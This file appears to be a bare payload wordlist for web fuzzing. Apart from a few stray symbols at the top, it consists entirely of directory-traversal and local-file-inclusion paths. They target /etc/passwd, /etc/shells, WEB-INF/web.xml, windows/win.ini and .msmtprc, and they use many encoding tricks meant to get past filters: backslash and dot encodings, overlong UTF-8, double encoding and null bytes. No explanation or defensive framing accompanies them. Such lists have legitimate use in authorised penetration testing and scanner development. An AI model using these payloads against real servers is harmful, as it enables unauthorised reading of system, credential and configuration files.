+
-
*
[]
/etc/shells
/..%5cetc/shells
/..%5c..%5cetc/shells
/..%5c..%5c..%5cetc/shells
/..%5c..%5c..%5c..%5cetc/shells
/..%5c..%5c..%5c..%5c..%5cetc/shells
/..%5c..%5c..%5c..%5c..%5c..%5cetc/shells
/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/shells
/static/..%5cetc/shells
/static/..%5c..%5cetc/shells
/static/..%5c..%5c..%5cetc/shells
/static/..%5c..%5c..%5c..%5cetc/shells
/static/..%5c..%5c..%5c..%5c..%5cetc/shells
/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/shells
/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/shells
/./../../../../../../../../../../etc/shells
/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/shells
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/shells
/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/shells
/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/shells
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/shells
/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/shells
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/shells
/..///////..////..//////etc/shells
/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/shells
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/shells
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/shells%00
/index.php?page=etc/shells
/index.php?page=etc/shells%00
/index.php?page=../../etc/shells
/index.php?page=....//....//etc/shells
/../../../../../../../../../etc/shells
/
/../../../../WEB-INF/web.xml
/../../../WEB-INF/web.xml
/../../WEB-INF/web.xml
/%c0%ae/%c0%ae/WEB-INF/web.xml
/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml
/%c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml
/../../../WEB-INF/web.xml;x=
/../../WEB-INF/web.xml;x=
/../WEB-INF/web.xml;x=
/WEB-INF/web.xml
/.//WEB-INF/web.xml
/../WEB-INF/web.xml
/%c0%ae/WEB-INF/web.xml
/etc/passwd
/..%5cetc/passwd
/..%5c..%5cetc/passwd
/..%5c..%5c..%5cetc/passwd
/..%5c..%5c..%5c..%5cetc/passwd
/..%5c..%5c..%5c..%5c..%5cetc/passwd
/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/static/..%5cetc/passwd
/static/..%5c..%5cetc/passwd
/static/..%5c..%5c..%5cetc/passwd
/static/..%5c..%5c..%5c..%5cetc/passwd
/static/..%5c..%5c..%5c..%5c..%5cetc/passwd
/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/./../../../../../../../../../../etc/passwd
/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd
/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd
/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini
/./../../../../../../../../../../windows/win.ini
/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini
/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini
/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
/?redirect=..%2f..%2f..%2f..%2fwindows/win.ini
/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini
/?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini
/.msmtprc
/?q=
/?type=
